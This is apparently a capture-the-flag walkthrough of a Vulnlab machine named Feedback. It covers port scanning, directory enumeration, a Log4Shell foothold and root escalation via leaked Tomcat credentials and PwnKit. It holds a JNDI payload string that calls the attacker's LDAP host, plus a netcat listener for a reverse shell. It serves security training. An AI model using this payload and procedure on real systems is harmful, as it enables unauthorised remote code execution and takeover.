This is a walkthrough of the machine Feedback on Vulnlab: https://www.vulnlab.com/
As of June 2025, Hack The Box HTB has migrated Vulnlab machines onto their lab offerings.
Enumeration
rustscan
└─$ rustscan -a 10.10.66.198 --ulimit 5000 --range 1-65535 -- -sVC -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.66.198:22
Open 10.10.66.198:8080
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 02:51 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:51
Completed NSE at 02:51, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 02:51
Completed Parallel DNS resolution of 1 host. at 02:51, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 02:51
Scanning 10.10.66.198 [2 ports]
Discovered open port 8080/tcp on 10.10.66.198
Discovered open port 22/tcp on 10.10.66.198
Completed Connect Scan at 02:51, 0.32s elapsed (2 total ports)
Initiating Service scan at 02:51
Scanning 2 services on 10.10.66.198
Completed Service scan at 02:51, 6.58s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.66.198.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:51
Completed NSE at 02:52, 6.05s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 1.12s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
Nmap scan report for 10.10.66.198
Host is up, received user-set (0.32s latency).
Scanned at 2024-05-04 02:51:49 EDT for 14s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f6:09:30:b6:ed:09:76:82:5c:8b:35:6e:3c:b4:f9:c8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7yy/2WRi9K75HnuxM328nonccsOP4itgr8PY9U1Y4HMeF28ngzwWSyK1wYjVvxUpdlwW4rIBXCtdMf1/7Jn5f6hXCyOJLeQQLLkoBTcHYxACW6F55mSekEz49obAFFH/ACAeezDQ/37fBZOFwxOwSXk5B5b1g4f9GpmaNX776KthlBVLLx1CUn531CiMWXzmIY9TSmQvlWi/pdwOa+4FEABuyCQVO41qCfCyRUX+h60pklEOhXqsIh0+yGRG0uyGwnwnHG7dKOgitcw2Z8YYUtXL6HJOHJKmsfbr6rjxXlp4Ct5lrYFNlXOKxB05YjTEJLAGM+1P4j/vogaNiAFGp
| 256 ca:2a:24:49:5c:02:51:ce:57:b8:44:3e:26:17:c2:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDoGN1gQm+PyY0FPm+sspVK2bAjxfcqAVL0dAThzQ11VAVNoNVDhKbe0/DK5y0IvKH2eIXugAjszCo6YAAaHo74=
| 256 b1:e5:be:17:07:b2:ff:2b:db:78:0d:cd:3e:bc:be:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHZlNCKrir0IjUR3q7Il9D2DeYeZM3GpeDRK9sqHDdBr
8080/tcp open http syn-ack Apache Tomcat 9.0.56
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.56
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.37 secondsweb server on 8080
I see a tomcat server on port 8080:
Next I run gobuster to look for hidden directories or files:
gobuster dir -k -u http://10.10.66.198:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,php,html -t 40
I discover a page on /feedback
It looks like I can enter strings into the feedback form:
I look at the source code and it indicates this was built with log4j, which is a clue to a potential foothold:
Initial Foothold – log4j RCE
I run searchsploit and find some scripts to run against the target:
I download the script but it seems really off and probably will give us issues with syntax.
I go directly to the github repo mentioned in the script at: https://github.com/kozmer/log4j-shell-poc
I download it with git clone https://github.com/kozmer/log4j-shell-poc
Make sure to follow the instructions on the github repo and install the dependencies with pip install -r requirements.txt
I read the script and in order for us to run it properly without any errors, we need to download the jdk file mentioned into the PoC folder.
We need to download this jdk version on the Oracle site, which requires a sign-in. The file is above 100+ mb.
Make sure it’s in the PoC folder:
Now we can run the script to run the LDAP server.
We need to catch the shell by running nc -lvnp 9001
We need to enter ${jndi:ldap://10.8.2.31:1389/a} into the feedback form. As indicated on the poc.py script that we ran.
It won’t work because we need to URL encode it.
Go to repeater using Burp:
We need to URL encode all the characters:
You’ll get a 200 response when you send the payload.
When we check our netcat listener we can see that we got a connection.
Make sure to run python3 -c “import pty;pty.spawn(‘/bin/bash’)” to upgrade the shell.
Privesc – tomcat password
linpeas
We run linpeas to check for privesc paths:
We immediately find credentials from the tomcat-users.xml file from the linpeas output
I simply su root and get the root user with the password:
Privesc – PwnKit
We also see that the machine is vulnerable to PwnKit from the linpeas output:
I download and run PwnKit and get root immediately.
Conclusion
This was a fairly straightforward machine. It took a while to figure out how to configure the script to run properly to get the initial foothold. Privesc was straightforward as well.
– Z333RO